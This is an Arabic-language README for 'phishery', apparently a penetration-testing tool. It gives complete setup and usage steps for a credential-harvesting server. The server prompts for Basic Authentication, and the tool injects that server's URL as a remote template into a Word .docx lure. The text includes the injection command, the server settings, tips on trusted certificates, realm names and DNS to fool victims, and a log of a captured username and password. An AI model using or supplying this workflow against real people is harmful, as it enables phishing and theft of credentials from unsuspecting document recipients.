
أداة جمع بيانات الاعتماد المدعومة بـ SSL و Basic Auth مع قاذف رابط قالب مستند Word
فيشري هو خادم HTTP بسيط مزود بـ SSL، والغرض الأساسي منه هو اصطياد بيانات الاعتماد عبر المصادقة الأساسية (Basic Authentication). كما يتيح فيشري إمكانية حقن عنوان URL بسهولة في مستند Word بصيغة .docx.

تتجلى قوة فيشري بشكل أفضل عند تعيين قالب مستند Word إلى عنوان URL لفيشري. يؤدي ذلك إلى إرسال Microsoft Word طلبًا إلى عنوان URL، مما يؤدي إلى ظهور مربع حوار المصادقة للمستخدم النهائي. يمكن حقن أي ملف .docx بعنوان URL باستخدام خيارات فيشري:
-i [docx المدخل] و -o [docx المخرج] و -u [url].
يمكن تنزيل حزم خاصة بنظام التشغيل من هنا.
استخرج الأرشيف، واختياريًا، انسخ الملف الثنائي إلى المسار $PATH
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin
$ phishery --help
|\ \\\\__ O __ _ __
| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __
> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /
|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, /
/_/ جامع بيانات الاعتماد بالمصادقة الأساسية (____/
مع حاقن قالب مستند Word
بدء الخادم : phishery -s settings.json -c credentials.json
حقن قالب : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
الخيارات:
-h, --help عرض الاستخدام والخروج.
-v عرض الإصدار والخروج.
-s ملف الإعدادات JSON المستخدم لإعداد الخادم. [الافتراضي: "settings.json"]
-c ملف JSON لتخزين بيانات الاعتماد التي تم جمعها. [الافتراضي: "credentials.json"]
-u عنوان URL لفيشري لاستخدامه كقالب لمستند Word.
-i ملف Word .docx ليتم حقه بعنوان URL القالب.
-o ملف Word .docx الجديد الذي يحتوي على عنوان URL القالب المحقون.
قم بتعديل ملف settings.json المقدم حسب الحاجة، يجب أن يبدو افتراضيًا هكذا:
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 200,
"responseFile": "template.dotx",
"responseHeaders": [
["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
]
}
سيؤدي هذا الإعداد إلى بدء تشغيل خادم HTTP على المنفذ 443 مع تمكين SSL باستخدام server.crt و server.key. تم تعيين نطاق المصادقة الأساسية إلى Secure Document Gateway. عند تقديم أي بيانات اعتماد، يتم إرسال حالة استجابة 200 مع محتويات ملف template.dotx المضمن ورأس نوع المحتوى: Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.
يمكن أيضًا تكوين ملف الإعدادات لإخراج نص بسيط باستخدام responseBody، على النحو التالي:
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 404,
"responseBody": "<h1>Not Found</h1>",
"responseHeaders": [
["Content-Type", "text/html"]
]
}
تعتمد فعالية هذه الأداة بشكل أساسي على اسم النطاق ونطاق المصادقة الأساسي المستخدمين، حيث أن ذلك غالبًا ما يكون كل ما يراه المستخدم النهائي عند تشغيلها من مستند Office. تأكد من توجيه سجلات DNS A الخاصة بك إلى IP العام لخادم فيشري.
يوصى باستبدال الشهادة المقدمة بأخرى موثوقة، مثل تلك التي تم إنشاؤها باستخدام LetsEncrypt. سيمنع Microsoft Word على نظام OS X مربع حوار المصادقة إذا كانت الشهادة غير صالحة، وسيطلب Microsoft Word على Windows من المستخدم قبول الشهادة غير الصالحة.
بمجرد تكوين الخادم وتشغيله، كل ما عليك فعله هو تضمين عنوان URL لفيشري في مستند، أو في أي مكان آخر ترغب فيه. يمنحك فيشري القدرة على حقن عنوان URL الخاص بك في مستند Word كقالب، ويمكن العثور على تعليمات حول كيفية القيام بذلك أدناه.
لحقن مستند Word بعنوان URL قالب، ستحتاج إلى ملف .docx وعنوان URL لخادم فيشري.
الآن قم بتشغيل فيشري مع المستند وعنوان URL:
$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] فتح مستند Word: good.docx
[+] تعيين قالب مستند Word إلى: https://secure.site.local/docs
[+] حفظ مستند Word المحقون إلى: bad.docx
[*] تم حفظ مستند Word المحقون!
تأكد من أن خادم فيشري قيد التشغيل ومتاح على عنوان URL الذي استخدمته. الآن عند فتح مستند Word، سيُطلب من الضحية مربع حوار المصادقة.
الآن عند فتح الضحية للمستند، سترى ما يلي:
$ ./phishery
[+] تم تهيئة مخزن بيانات الاعتماد في: credentials.json
[+] بدء تشغيل خادم HTTPS للمصادقة على: 0.0.0.0:443
[*] تم تلقي طلب في 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] إرسال استجابة المصادقة الأساسية إلى: 127.0.0.1
[*] تم جمع بيانات اعتماد جديدة!
[HTTP] المضيف : secure.example.local
[HTTP] الطلب : /docs
[HTTP] وكيل المستخدم : Microsoft Office Word
[HTTP] عنوان IP : 127.0.0.1
[AUTH] اسم المستخدم : john.doe
[AUTH] كلمة المرور : Summer15